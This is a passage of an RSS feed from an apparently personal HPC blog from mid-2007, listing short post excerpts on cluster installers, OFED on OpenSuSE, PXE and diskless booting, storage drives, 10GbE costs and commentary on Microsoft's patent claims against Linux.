      <title>Writing with a broken laptop</title>
      <link>https://blog.scalability.org/2007/06/writing-with-a-broken-laptop/</link>
      <pubDate>Thu, 28 Jun 2007 04:36:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/writing-with-a-broken-laptop/</guid>
      <description>Well, the laptop is not broken, but the USB ports are. Which means my mouse doesn&amp;rsquo;t work. So I have to use the track pad. Which means as I type my mouse pointer jumps all over the place.
Owie. Going to buy a new laptop soon anyway. Wish someone had a quad core out there (big evil grin) with 4 GB RAM, super nice nVidia graphics, 15.4 inch screen, 160 GB SATA 7200 RPM drive.</description>
    </item>
    
    <item>
      <title>I hope this is not a mistake in the 1TB drive spec&#39;s from Seagate</title>
      <link>https://blog.scalability.org/2007/06/i-hope-this-is-not-a-mistake-in-the-1tb-drive-specs-from-seagate/</link>
      <pubDate>Wed, 27 Jun 2007 14:28:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/i-hope-this-is-not-a-mistake-in-the-1tb-drive-specs-from-seagate/</guid>
      <description>Go have a look at the specs. Specifically at the read and write seek latencies.
Everyone say it with me now &amp;hellip;. oooooohhhhhhhhhh aaaaaaahhhhhhhh. If this is the case, then 15kRPM FC/SCSI is pretty much over. These units come in SAS and SATA at these densities. JackRabbit will be quite happy.</description>
    </item>
    
    <item>
      <title>ISC 07</title>
      <link>https://blog.scalability.org/2007/06/isc-07/</link>
      <pubDate>Wed, 27 Jun 2007 13:43:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/isc-07/</guid>
      <description>Wish I was there. Have an injured foot, recovering slowly. Not sure what I did. Aside from that, costs to fly into Dresden were huge. Looked at Frankfurt, Berlin, Prague &amp;hellip; Ugh. Maybe next year. Microsoft PR sent me some information pointers, I invited them to post here. Hopefully they will. I want adoption numbers. Looking over the PR and thinking it through, if they were having a massive adoption, I think that would be what they would talk about.</description>
    </item>
    
    <item>
      <title>Issues in HPC as a business: a view as a small solutions provider</title>
      <link>https://blog.scalability.org/2007/06/issues-in-hpc-as-a-business-a-view-as-a-small-solutions-provider/</link>
      <pubDate>Wed, 27 Jun 2007 12:11:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/issues-in-hpc-as-a-business-a-view-as-a-small-solutions-provider/</guid>
      <description>One of the things all HPC vendors have to deal with is competition. This is fine, and doesn&amp;rsquo;t worry me. Fair competition can be quite good, and even exciting. It&amp;rsquo;s the unfair competition that bugs me.
Suppose we have a potential customer X. Said customer works with us, we generate benchmark data, show them what we can do with well tuned systems. Customer likes it. Asks us for a quote. We provide one, and the price is good.</description>
    </item>
    
    <item>
      <title>An upswell of interest in many core workstations</title>
      <link>https://blog.scalability.org/2007/06/an-upswell-of-interest-in-many-core-workstations/</link>
      <pubDate>Wed, 27 Jun 2007 12:04:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/an-upswell-of-interest-in-many-core-workstations/</guid>
      <description>At my day job, we have delivered a number of dual processor workstations to customers over the years with really nice nVidia graphics. Recently, a customer bought 2 4-core workstations, really nice nVidia graphics, and 32 GB ram, with 1 TB RAID disk. Then another asked for 4-core and 8-core workstations, which we provided. Now one of our larger customers is asking for 8-core and 16-core workstations with 32 GB ram.</description>
    </item>
    
    <item>
      <title>Convergence and diversification</title>
      <link>https://blog.scalability.org/2007/06/convergence-and-diversification/</link>
      <pubDate>Wed, 27 Jun 2007 11:56:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/convergence-and-diversification/</guid>
      <description>The market has been consolidating behind various OSes for a while. Reducing the number of ports reduces ISV costs. It reduces end user management headache. Curiously enough it also reduces the engineering costs of the relevant hardware vendors, but don&amp;rsquo;t tell a few of them that, as they still perceive value where they feel they can be different. Unfortunately I have a sense of mayhem in two of the converged OSes, Linux and Windows.</description>
    </item>
    
    <item>
      <title>Patch for OFED-1.2 build on OpenSUSE 10 with a nice updated kernel</title>
      <link>https://blog.scalability.org/2007/06/patch-for-ofed-12-build-on-opensuse-10-with-a-nice-updated-kernel/</link>
      <pubDate>Mon, 25 Jun 2007 20:56:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/patch-for-ofed-12-build-on-opensuse-10-with-a-nice-updated-kernel/</guid>
      <description>Tracking this one down was fun. It turns out someone, either in SuSE-land or Linux-land, has decided that HZ is a dangerous macro to expose to users. Dangerous. Therefore, they wrap it in a kernel cloak. Which has the net effect of breaking large swaths of code which happen to use the quite innocuous HZ macro. Grrrrrr.
Digging through and dereferencing all the included header files I found this &amp;hellip;
#ifndef _ASMx86_64_PARAM_H
#define _ASMx86_64_PARAM_H
#ifdef __KERNEL__</description>
    </item>
    
    <item>
      <title>This one hurts</title>
      <link>https://blog.scalability.org/2007/06/this-one-hurts/</link>
      <pubDate>Sun, 24 Jun 2007 19:49:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/this-one-hurts/</guid>
      <description>Working on simplifying and refactoring some Makefiles for DragonFly. Yeah, will mention what it is eventually. In the makefile, I build a bunch of perl modules. The previous version of this system had a pre-pulled set of CPAN modules, and all the bits had file system names like DBIx-SimplePerl-1.8.tar.gz Which is nice and easy to deal with. In order to make sure we can use this for updating as well, I thought it would be nice to exploit CPAN and the module name without the version.</description>
    </item>
    
    <item>
      <title>Re-inventing wheels</title>
      <link>https://blog.scalability.org/2007/06/re-inventing-wheels/</link>
      <pubDate>Thu, 21 Jun 2007 21:11:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/re-inventing-wheels/</guid>
      <description>Why does SuSE insist on re-inventing wheels that others have done a far better job of inventing? I don&amp;rsquo;t get it. Specifically I am referring to not using yum in favor of their zypper and zmd and &amp;hellip;
C&amp;rsquo;mon SuSE, get with the program. Use yum. So we can stop messing around with yet-another-broken-thing-that-promises-to-be-better-someday. The yum &amp;ldquo;packaged&amp;rdquo; with SuSE is old and broken. Worse, it sometimes mysteriously fails. And even worse, it is effectively impossible to upgrade to the latest version.</description>
    </item>
    
    <item>
      <title>Accidental profound wisdom</title>
      <link>https://blog.scalability.org/2007/06/accidental-profound-wisdom/</link>
      <pubDate>Thu, 21 Jun 2007 03:12:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/accidental-profound-wisdom/</guid>
      <description>Well, this might not be the most appropriate title for this. I need to explain this, but first let me point to the article/email in question. Now that I have pointed to it, I want to note that there is a deeply profound set of statements in this email, which seems to be a series of responses to a discussion. Bear with me.
In this email, Linus Torvalds discusses some things about the licensing of Linux.</description>
    </item>
    
    <item>
      <title>Article up at Linux Magazine HPC site</title>
      <link>https://blog.scalability.org/2007/06/article-up-at-linux-magazine-hpc-site/</link>
      <pubDate>Thu, 21 Jun 2007 02:22:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/article-up-at-linux-magazine-hpc-site/</guid>
      <description>See here. Though apart from getting the author mixed up with the editor &amp;hellip;</description>
    </item>
    
    <item>
      <title>Just too funny</title>
      <link>https://blog.scalability.org/2007/06/just-too-funny/</link>
      <pubDate>Thu, 21 Jun 2007 00:48:53 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/just-too-funny/</guid>
      <description>I do quite a bit of Perl programming work in support of our products. Perl is sometimes (mistakenly IMO) called a scripting language; it may have been designed to handle that in the past, but it has evolved over the decades into something far more powerful. But it also has this &amp;hellip; well &amp;hellip; implicit sense of humor about it. Maybe this is what pisses off people advocating other programming languages.</description>
    </item>
    
    <item>
      <title>The data is coming, the data is coming</title>
      <link>https://blog.scalability.org/2007/06/the-data-is-coming-the-data-is-coming/</link>
      <pubDate>Mon, 18 Jun 2007 04:43:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/the-data-is-coming-the-data-is-coming/</guid>
      <description>I&amp;rsquo;ve been talking for the better part of the last decade about one of the more serious problems looming for HPC, and frankly for all computing. Call it a data deluge or exponential data growth, whatever you would like. At the end of the day it means that you have more data than before, and it is growing faster than you think. Usually much faster than Moore&amp;rsquo;s law which gives you an order of magnitude about every 6 years.</description>
    </item>
    
    <item>
      <title>Tiburon nearly ready for beta</title>
      <link>https://blog.scalability.org/2007/06/tiburon-nearly-ready-for-beta/</link>
      <pubDate>Fri, 15 Jun 2007 17:01:54 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/tiburon-nearly-ready-for-beta/</guid>
      <description>Installer works. Load a compute node mostly automagically (one step by hand during debugging phase, could automate this trivially) with OpenSuSE 10.2 x86_64, OFED 1.2-rc4, &amp;hellip; sets up and configures addresses, mount points, user authentication (using NIS for the moment, anything we can script should work fine, LDAP would be preferred eventually), cluster queuing, yadda yadda yadda. The goal is to enable load/configure of any OS using PXEboot, without imaging. Some folks like imaging.</description>
    </item>
    
    <item>
      <title>Catfight at the LKML corral</title>
      <link>https://blog.scalability.org/2007/06/catfight-at-the-lkml-corral/</link>
      <pubDate>Wed, 13 Jun 2007 13:57:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/catfight-at-the-lkml-corral/</guid>
      <description>ok, not really. Linus stated some things in a post to the linux kernel mailing list. IMO he is spot on. Jonathan&amp;rsquo;s reply is what I expect from a CEO.
Our experience in trying to work with Sun has been one of them pushing Solaris as the solution for everything, even when customers (and resellers in our case) spec&amp;rsquo;ed designs using Linux as the customers preferred. Solaris is not being targeted by many new ISVs or IHVs, Linux is.</description>
    </item>
    
    <item>
      <title>OT from HPC: Michigan economy</title>
      <link>https://blog.scalability.org/2007/06/ot-from-hpc-michigan-economy/</link>
      <pubDate>Wed, 13 Jun 2007 13:10:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/ot-from-hpc-michigan-economy/</guid>
      <description>Being a Michigander, I have an interest in seeing Michigan grow and thrive. This is a very nice state; there are many positive aspects to it. Apart from some union rules and the proclivity of our state government to tax, it is a good place to set up and run a business. Costs are low, burn rates are low, and relative to the rest of the country, salaries and home prices are lower.</description>
    </item>
    
    <item>
      <title>The virtues of test-driven methodology in program development</title>
      <link>https://blog.scalability.org/2007/06/the-virtues-of-test-driven-methodology-in-program-development/</link>
      <pubDate>Tue, 12 Jun 2007 12:38:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/the-virtues-of-test-driven-methodology-in-program-development/</guid>
      <description>Short post, directly related to HPC. Short version: When developing new features for a program, routine, method, whatever, it is a good idea to test it how you think you will use it.
Ok. This is a dumb one. Working on our Tiburon installer. Will help with managing clusters of things. Like Linux/other compute clusters. And JackRabbits (storage clusters). Part of the installer makes use of a Perl module I wrote named DBIx::SimplePerl.</description>
    </item>
    
    <item>
      <title>A little PXE dust here and there</title>
      <link>https://blog.scalability.org/2007/06/a-little-pxe-dust-here-and-there/</link>
      <pubDate>Mon, 11 Jun 2007 04:21:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/a-little-pxe-dust-here-and-there/</guid>
      <description>I now have a reasonable version of our Tiburon project installer working. Integrates a number of things via PXE boot. Had abandoned pxegrub in large part due to the grub team abandoning (for the most part) grub v0.9x (aka stuff that worked ok) in favor of the great big redesign and reimplementation (which doesn&amp;rsquo;t seem to be working).
Don Becker, networking/clustering guru, had warned of seriously borked PXE implementations in hardware, and how they interacted, badly, with TFTP.</description>
    </item>
    
    <item>
      <title>OFED 1.2 on OpenSuSE 10.2</title>
      <link>https://blog.scalability.org/2007/06/ofed-12-on-opensuse-102/</link>
      <pubDate>Fri, 08 Jun 2007 13:17:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/ofed-12-on-opensuse-102/</guid>
      <description>Well, looks like it works. The relevant directory is http://downloads.scalableinformatics.com/downloads/OFED-1.2-rc2/OpenSuSE10.2/ and you need to install the kernel before you install the RPMs. Note that you will have to run mkinitrd by hand (very easy, just &amp;ldquo;mkinitrd&amp;rdquo;), and add it into /boot/grub/menu.lst. This is, again, very easy to do.
Also, as I am a strong proponent of yum, this is a &amp;ldquo;yumable&amp;rdquo; path:
[OFED-1.2-rc2-OpenSuSE10.2]
name=OFED 1.2-rc2 for OpenSuSE 10.2
baseurl=http://downloads.scalableinformatics.com/downloads/OFED-1.2-rc2/OpenSuSE10.2/
enabled=1
which should let you do a yum install ibtools and other bits.</description>
    </item>
    
    <item>
      <title>Concern over drive failure rates</title>
      <link>https://blog.scalability.org/2007/06/concern-over-drive-failure-rates/</link>
      <pubDate>Fri, 08 Jun 2007 12:56:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/concern-over-drive-failure-rates/</guid>
      <description>Our JackRabbit storage unit uses lots of hard disks. The larger unit uses 48 drives in a 5U rack mount chassis. We selected and used the Seagate 750 GB NL drives for the unit, giving it a whopping 36 TB fully configured, with absolutely industry leading performance, density, etc. This is not a JackRabbit commercial, we are proud of our little L. Flavigularis though &amp;hellip; My concern is drive failure rates.</description>
    </item>
    
    <item>
      <title>The danger of monoculture</title>
      <link>https://blog.scalability.org/2007/06/the-danger-of-monoculture/</link>
      <pubDate>Fri, 08 Jun 2007 02:29:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/the-danger-of-monoculture/</guid>
      <description>Those with anti-Microsoft postures might think this will be a missive about Microsoft. It is not. Microsoft will not be mentioned here apart from these two sentences.
The monoculture to which I refer is that of building dependencies upon particular packaging mechanisms in open source tools, or upon specific distributions. We are trying to build OFED-1.x for OpenSuSE 10.2 in order to provide Infiniband driver support to a customer&amp;rsquo;s cluster. OFED supports RPM distributions, specifically highly specific versions from RedHat and SuSE.</description>
    </item>
    
    <item>
      <title>Google snaps up Peakstream</title>
      <link>https://blog.scalability.org/2007/06/google-snaps-up-peakstream/</link>
      <pubDate>Wed, 06 Jun 2007 12:25:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/google-snaps-up-peakstream/</guid>
      <description>whoa. This one I did not see coming. It suggests that Google is serious about performance, and possibly, providing performance to its customers using tools such as PeakStream to provide acceleration. Google into acceleration. With a huge distributed supercomputer.
Hmmm&amp;hellip;.. I wonder if the VCs out there can take time from the next Web 3.0 picture upload site or repackaged open source group to think about this. Nah. Overall, if you can provide high performance tools for reasonable prices (marginal cost above existing system prices), you have value.</description>
    </item>
    
    <item>
      <title>Extraordinarily cool</title>
      <link>https://blog.scalability.org/2007/06/extraordinarily-cool/</link>
      <pubDate>Mon, 04 Jun 2007 03:17:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/extraordinarily-cool/</guid>
      <description>Was finally able to get Feisty booted diskless. It is running in a VMWare server session. See the picture below.
[ ](http://scalability.org/images/diskless-ubuntu-in-vmware.png)
Not perfect, need to clean up the mounts a bit, and fix up some other things, but this is the right direction for us. Quite happy about this.</description>
    </item>
    
    <item>
      <title>Updated RSS</title>
      <link>https://blog.scalability.org/2007/06/updated-rss/</link>
      <pubDate>Sun, 03 Jun 2007 12:57:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/updated-rss/</guid>
      <description>let me know if it breaks anything &amp;hellip;</description>
    </item>
    
    <item>
      <title>OT: missing the point</title>
      <link>https://blog.scalability.org/2007/06/ot-missing-the-point/</link>
      <pubDate>Sun, 03 Jun 2007 12:31:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/06/ot-missing-the-point/</guid>
      <description>I use Linux on my laptop. Have for years. Use lots of business tools there. Browse web pages with firefox, get email with thunderbird. Create, modify, finalize, present &amp;ldquo;office&amp;rdquo; documents (Excel spreadsheets, powerpoint presentations, Word documents). Watch video clips (legal), DVDs (legal), etc. It makes for a great platform for these things. Stable, fast, virus free.
One of my big complaints about dealing with web pages has been the propensity to code to IE-whatever.</description>
    </item>
    
    <item>
      <title>Cool...</title>
      <link>https://blog.scalability.org/2007/05/cool/</link>
      <pubDate>Wed, 30 May 2007 12:38:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/05/cool/</guid>
      <description>Surface computing. I can see uses for this, in HPC and analytics, not to mention tele/remote medicine, science/engineering &amp;hellip; Kudos to Microsoft. This should be quite cool.</description>
    </item>
    
    <item>
      <title>diskless ...</title>
      <link>https://blog.scalability.org/2007/05/diskless/</link>
      <pubDate>Tue, 29 May 2007 21:04:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/05/diskless/</guid>
      <description>still not behaving with Ubuntu 7.04 or 6.10. In 6.10, at least it gets the nfs-premount scripts, and then tries (and fails, due to a missing colon) the /root directory from the NFS server. Reminds me of the autoinst days of long past. Took a while to figure out how to get Irix booted diskless, but once that happened and I could do it reliably, the rest was easy&amp;hellip;. er &amp;hellip; yeah&amp;hellip; easy.</description>
    </item>
    
    <item>
      <title>PXE Boot OS and configuration</title>
      <link>https://blog.scalability.org/2007/05/pxe-boot-os-and-configuration/</link>
      <pubDate>Mon, 28 May 2007 19:50:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/05/pxe-boot-os-and-configuration/</guid>
      <description>Our systems install via PXE boot whenever possible. Much faster than DVD/CD, floppies and alike. I have been fighting with PXELINUX (part of the excellent SYSLINUX package of boot loaders with menus) trying to get it working the way I want it to. This is important for JackRabbit and our compute clusters.
Of course I was using the native SYSLINUX package, something around version 2.09 or something like that. I had pxegrub loading, but then it would basically hang while working with the network.</description>
    </item>
    
    <item>
      <title>lightcones, filesystems and messages, and large distributed clusters with non-infinite bandwidth and finite latency</title>
      <link>https://blog.scalability.org/2007/05/lightcones-filesystems-and-messages-and-large-distributed-clusters-with-non-infinite-bandwidth-and-finite-latency/</link>
      <pubDate>Mon, 28 May 2007 05:57:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/05/lightcones-filesystems-and-messages-and-large-distributed-clusters-with-non-infinite-bandwidth-and-finite-latency/</guid>
      <description>A point I try to make to customers at the day job is that, as you scale up a systems size, your design will need to scale as well. And this begs the question. How will it need to change?
Currently (May 2007) simple NFS suffers from 1/N problems (1/N meaning that as the average number of requesters N increases, the average available fixed resource available per requester works out to about 1/N &amp;hellip; modulo duty cycles, transients, etc).</description>
    </item>
    
    <item>
      <title>language&#43;&#43;</title>
      <link>https://blog.scalability.org/2007/05/language/</link>
      <pubDate>Sun, 27 May 2007 23:34:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/05/language/</guid>
      <description>Ok, it hit me today. I know what I want, or at least in part, in a language. I do not want to write loops. I want to write something like this:
range: i=1 .. N; a[i] = b[i]+c*d[i]; You don&amp;rsquo;t see any explicit &amp;ldquo;for&amp;rdquo; loops. No explicit control structures. The rationale I have for this is that without an explicit set of control structures, the compiler is freer to transform the code to match the underlying machine architecture.</description>
    </item>
    
    <item>
      <title>Nail, hammer, hit hit hit ...</title>
      <link>https://blog.scalability.org/2007/05/nail-hammer-hit-hit-hit/</link>
      <pubDate>Sun, 27 May 2007 19:41:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/05/nail-hammer-hit-hit-hit/</guid>
      <description>Michael Suess over at the always interesting Thinking Parallel blog wrote a number of interesting pieces recently. I would suggest a trip over there to read some of them. I must thank him at some point for pointing to us as part of his &amp;ldquo;you are what you read&amp;rdquo; post. We aren&amp;rsquo;t on an anti-Microsoft spree, and I am not trying to &amp;ldquo;kill&amp;rdquo; them. I am being skeptical about their motives, and noting that there are alternative and simpler explanations for their actions.</description>
    </item>
    
    <item>
      <title>Ill-behaved web-crawlers</title>
      <link>https://blog.scalability.org/2007/05/ill-behaved-web-crawlers/</link>
      <pubDate>Sun, 27 May 2007 19:10:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/05/ill-behaved-web-crawlers/</guid>
      <description>This is not about HPC. I look at our logs every now and then to see if we have problems which aren&amp;rsquo;t normally covered in monitoring scenarios. Looking over the web logs, I see the usual usage, and bots. Some bots have been poorly behaved, some are quite intelligent. Google&amp;rsquo;s are pretty good.
So are many of the others. A group of them are very poor web-denizens, who seem to be incapable of understanding the links they see, and blindly follow them.</description>
    </item>
    
    <item>
      <title>Ahhh ... the business rationale becomes clear ...</title>
      <link>https://blog.scalability.org/2007/05/ahhh-the-business-rationale-becomes-clear/</link>
      <pubDate>Sun, 27 May 2007 14:51:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/05/ahhh-the-business-rationale-becomes-clear/</guid>
      <description>From John West&amp;rsquo;s InsideHPC blog I found a link to a link to a paper on a Microsoft site. This paper starts out with lofty goals
Sounds great, they are going to teach us a set of best practices for HPC. Cool. I like learning new things, so this should be helpful. They continue a little later on &amp;hellip;
Hmmm&amp;hellip; If they think HPC is all about solutions that can be used to crunch complex mathematical problems in a variety of areas, then we have a problem.</description>
    </item>
    
    <item>
      <title>The story that will not go away</title>
      <link>https://blog.scalability.org/2007/05/the-story-that-will-not-go-away/</link>
      <pubDate>Thu, 24 May 2007 23:28:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/05/the-story-that-will-not-go-away/</guid>
      <description>The Register reports that Microsoft is
uh&amp;hellip; yeah. This whole thing bothers me. Because it means that Microsoft is implying that anyone in HPC using Linux is a thief, stealing and using Microsoft intellectual property without paying Microsoft for the privilege. Neat strategy. &amp;ldquo;Use our stuff and we won&amp;rsquo;t sue&amp;rdquo;.
I can&amp;rsquo;t believe that I am the only one that finds this offensive. Somewhat more odious than their initial marketing message of &amp;ldquo;now HPC is mainstream.</description>
    </item>
    
    <item>
      <title>Compilers</title>
      <link>https://blog.scalability.org/2007/05/compilers/</link>
      <pubDate>Thu, 24 May 2007 18:22:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/05/compilers/</guid>
      <description>I like the intel compilers. The generate nice code on intel platforms. The problem is when you use them for your product, you only get good code for intel platforms. The resulting code winds up being slow in many cases on Opterons. Which is not good.
I have been talking about this point for a while. There are hacks you can use with your intel generated code to take out the specific processor test cases, and just run them on opterons, and surprise, they run often better than without those hacks.</description>
    </item>
    
    <item>
      <title>How do you program N cores (as N -&gt; infinity)</title>
      <link>https://blog.scalability.org/2007/05/how-do-you-program-n-cores-as-n-infinity/</link>
      <pubDate>Thu, 24 May 2007 18:12:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/05/how-do-you-program-n-cores-as-n-infinity/</guid>
      <description>I have been touching on some of the aspects of this in various posts here recently. Basically you have 2 roughly related technologies to work with today. Shared memory (OpenMP) and distributed memory (MPI). Sure there are others, but these dominate. But there is a problem with these.
In the case of OpenMP, you annotate your source, and the compiler does the work. But it only does the work assuming you have a shared memory system.</description>
    </item>
    
    <item>
      <title>... and receive and receive ...</title>
      <link>https://blog.scalability.org/2007/05/and-receive-and-receive/</link>
      <pubDate>Wed, 23 May 2007 02:21:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/05/and-receive-and-receive/</guid>
      <description>What a day for 10GbE. Ask a question. Get a few answers. Inexpensive NICs are good. So are inexpensive switches. Have a look at Woven systems.</description>
    </item>
    
    <item>
      <title>Ask, and ye shall receive</title>
      <link>https://blog.scalability.org/2007/05/ask-and-ye-shall-receive/</link>
      <pubDate>Tue, 22 May 2007 02:38:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/05/ask-and-ye-shall-receive/</guid>
      <description>I asked earlier today where the 10GbE was, noting that NICs were horribly expensive, and switches were bad as well. Well, I just read this which suggests the Mellanox will be sourcing chips to builders for reasonable pricing. Now only if CX-4 weren&amp;rsquo;t so expensive &amp;hellip;</description>
    </item>
    
    <item>
      <title>Can you say ... &#34;backfire&#34; ?</title>
      <link>https://blog.scalability.org/2007/05/can-you-say-backfire/</link>
      <pubDate>Tue, 22 May 2007 02:29:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/05/can-you-say-backfire/</guid>
      <description>Over at Digital Tipping Point we see something quite interesting. The blog author has set up a list for people to sign up to be sued by Microsoft for patent infringement. Now you might think I mean &amp;ldquo;backfire&amp;rdquo; as in these people are nuts. This is not what I mean.
What I mean is that the patent threats have managed to open up a whole new front, one that has surprised me, as I did not think of it.</description>
    </item>
    
    <item>
      <title>Wherefore art thou, 10GbE?</title>
      <link>https://blog.scalability.org/2007/05/wherefore-art-thou-10gbe/</link>
      <pubDate>Mon, 21 May 2007 12:26:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/05/wherefore-art-thou-10gbe/</guid>
      <description>For quite a while, we have been hearing about how great 10GbE is. I like the idea, it is just ethernet. Plug it in (with CX-4 &amp;hellip; ) and off you go.
There are only a few flies in this particular ointment. Cost: per-port costs of 10GbE are huge. The NICs are running in the thousands of USD ($), and the switches &amp;hellip; well &amp;hellip; let&amp;rsquo;s not go there.</description>
    </item>
    
    <item>
      <title>WinXP x64</title>
      <link>https://blog.scalability.org/2007/05/winxp-x64/</link>
      <pubDate>Mon, 21 May 2007 01:10:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/05/winxp-x64/</guid>
      <description>Loaded it on two &amp;ldquo;desktop&amp;rdquo; systems for a customer evaluation. Well these are desktops in name only. Smaller than the other ferocious beasts we finished building last week, but still &amp;hellip;
The small ones are a dual dual-core Opteron 2220 system with 8 GB ram, and 1 TB of fast disk, and a dual quad core Clovertown 5310 unit with 8 GB ram, and 1 TB of fast disk. Only differences were processor, motherboard, and RAM type, the rest of the specs were the same.</description>
    </item>
    
    <item>
      <title>Opting for the sane strategy</title>
      <link>https://blog.scalability.org/2007/05/opting-for-the-sane-strategy/</link>
      <pubDate>Wed, 16 May 2007 01:43:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/05/opting-for-the-sane-strategy/</guid>
      <description>Lots of people called this for what it was. FUD. Pure and simple. Marketing by threatened litigation. This evening, information-week posted more discussion, including Linus Torvalds viewpoint. Not so oddly enough, his view was quite similar with my thoughts. That wasn&amp;rsquo;t what struck me. It was the backpedaling.
My thoughts are, simply put, what utter hogwash. Their comments were a carefully prepared shot across the bow. It was meant to have marketing impact.</description>
    </item>
    
    <item>
      <title>State of the FUD, day 3, morning</title>
      <link>https://blog.scalability.org/2007/05/state-of-the-fud-day-3-morning/</link>
      <pubDate>Tue, 15 May 2007 13:51:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/05/state-of-the-fud-day-3-morning/</guid>
      <description>This morning, more &amp;ldquo;coverage&amp;rdquo; (being generous here). First USA Today tells us that &amp;ldquo;Microsoft details patent breaches.&amp;quot; This seems to be a new definition of the word &amp;ldquo;detail&amp;rdquo;, one that I am not quite familiar with. Detail usually means &amp;ldquo;extended treatment of or attention to particular items&amp;rdquo;. The definition of detail for the USA today piece appears to be different. No details on patents. Just &amp;ldquo;counts&amp;rdquo;. Moreover, the article indicates that</description>
    </item>
    
    <item>
      <title>FUD update, day 2</title>
      <link>https://blog.scalability.org/2007/05/fud-update-day-2/</link>
      <pubDate>Tue, 15 May 2007 02:42:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/05/fud-update-day-2/</guid>
      <description>Well, we seem to not have been the only ones to notice the problems with the arguments made by Microsoft legal. Larry Augustin, of VA Linux fame, wrote a response that is worth reading. In it he basically says &amp;ldquo;put them up (the allegedly infringed patents, and where the infringing code/design is), or shut up.&amp;rdquo; The critical &amp;ldquo;money&amp;rdquo; quote is
That is the point after all. Super-secret evidence. Reminds me of the Animal House movie.</description>
    </item>
    
    <item>
      <title>Locality and centrality in massive computing and storage systems</title>
      <link>https://blog.scalability.org/2007/05/locality-and-centrality-in-massive-computing-and-storage-systems/</link>
      <pubDate>Mon, 14 May 2007 01:43:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/05/locality-and-centrality-in-massive-computing-and-storage-systems/</guid>
      <description>Here we are in the age of the cluster and grid, with distributed shared nothing approaches to processing cycles, and we collectively have this rather ironic fixation on shared file systems. This is amusing as one of the critical arguments for distributed computing is that, in aggregate, N processors provides N times the number of processing cycles that 1 processor can provide, and shared resources are contended for resources (e.g. bottlenecks).</description>
    </item>
    
    <item>
      <title>If your competitor beats you in the marketplace, then FUD, FUD, FUD</title>
      <link>https://blog.scalability.org/2007/05/if-your-competitor-beats-you-in-the-marketplace-then-fud-fud-fud/</link>
      <pubDate>Mon, 14 May 2007 01:11:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/05/if-your-competitor-beats-you-in-the-marketplace-then-fud-fud-fud/</guid>
      <description>What do you do when a competitor encroaches upon your cash cows, starts usurping deals, demonstrates unbeatable TCO, infinitely better acquisition cost, better security and resilience to attacks? You FUD them of course. FUD being the act of creating Fear, Uncertainty, and Doubt about them. Say, for example, dangling the possibility of lawsuits against users of the competitors products. Scare your customers, scare their customers.
And how do you do this?</description>
    </item>
    
    <item>
      <title>Updated mkchbond.pl</title>
      <link>https://blog.scalability.org/2007/05/updated-mkchbondpl/</link>
      <pubDate>Sun, 06 May 2007 20:40:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/05/updated-mkchbondpl/</guid>
      <description>Our mkchbond.pl script automates the creation of channel bond entries in Redhat and now SuSE Linux. Its primary reason for existing is to automate a process that is editing intensive, and somewhat annoying. It also provides dry runs by default, you have to tell it to &amp;ndash;write a file before it will touch anything.
For example: to create a 4 way channel bond named bond0 out of eth2, eth3, eth4, eth5, with an IP address of the bond as 192.</description>
    </item>
    
    <item>
      <title>Worth a read</title>
      <link>https://blog.scalability.org/2007/05/worth-a-read/</link>
      <pubDate>Wed, 02 May 2007 16:19:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/05/worth-a-read/</guid>
      <description>Have a look at this link. We have pointed out that Microsoft has had a great opportunity to a) do the right thing, b) do it in a multiplatform manner. Would make lots of customers/end users happy. Lower barriers and all that.
Unfortunately, I am not sure Microsoft quite grasps that this is why clusters are so powerful, or why Open Source is so widely used. It&amp;rsquo;s all about the barriers, and getting around them.</description>
    </item>
    
    <item>
      <title>Accelerated computing appliances</title>
